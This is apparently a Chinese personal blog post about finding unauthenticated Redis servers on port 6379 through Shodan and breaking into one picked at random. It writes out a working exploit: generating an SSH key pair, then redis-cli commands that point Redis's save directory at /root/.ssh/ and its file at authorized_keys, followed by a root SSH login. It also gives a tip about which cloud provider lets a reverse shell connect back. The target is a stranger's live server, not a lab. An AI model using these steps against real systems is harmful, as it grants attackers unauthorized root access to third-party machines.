用shodan搜索redis未授权并利用

有望得到的要努力,无望得到的不介意,则无论输赢姿态都会好看

黑五的时候花了5美元买了个shodan的会员,今天突然想搞一下redis未授权,平常搞得未授权比较多,大多开发都没注意到这一点,今天用shodan搜索了一下redis,通过redis未授权找个服务器练练手,毕竟百闻不如一见,多看不如一试

首先用shodan搜索port:6379,6379为redis端口,然后通过shodan搜索一下

随便找一个,然后通过我的腾讯云,连接一下,建议进行实践的时候用腾讯云,因为阿里云会被封,那个shell弹不回来

fantan

能够连上并且可以尝试写命令,那么我们就可以通过ssh用公钥的形式登录,其实也有一种通过定时任务的方法,可以自己去尝试一下,首先在本地生产公私钥文件

使用ssh-keygen –t rsa生成公钥,这里可以看到公钥已经生成

然后通过(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt将公钥写入foo.txt中,最后连接redis写入文件

1
2
3
4
5
6
cat foo.txt | redis-cli -h xxx.xxx.xxx.xxx -x set crackit
redis-cli -h xxx.xxx.xxx.xxx
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
save

一顿操作之后可以看到结果了

这里设定了crackit的键值为公钥,并通过redis命令变更Redis DB 文件及存放地点为默认root用户SSH key存放文件,并将键值重定向追加到远程文件authorized_keys的末尾,也就上传了公钥 ,然后再用ssh -i id_rsa [email protected]通过公钥的形式登录

这时候就可以看到服务器信息了,ubuntu18.04,到这里,今天实操也算是有所收获,也算是对自己的一种鼓励,扫一扫之前的阴霾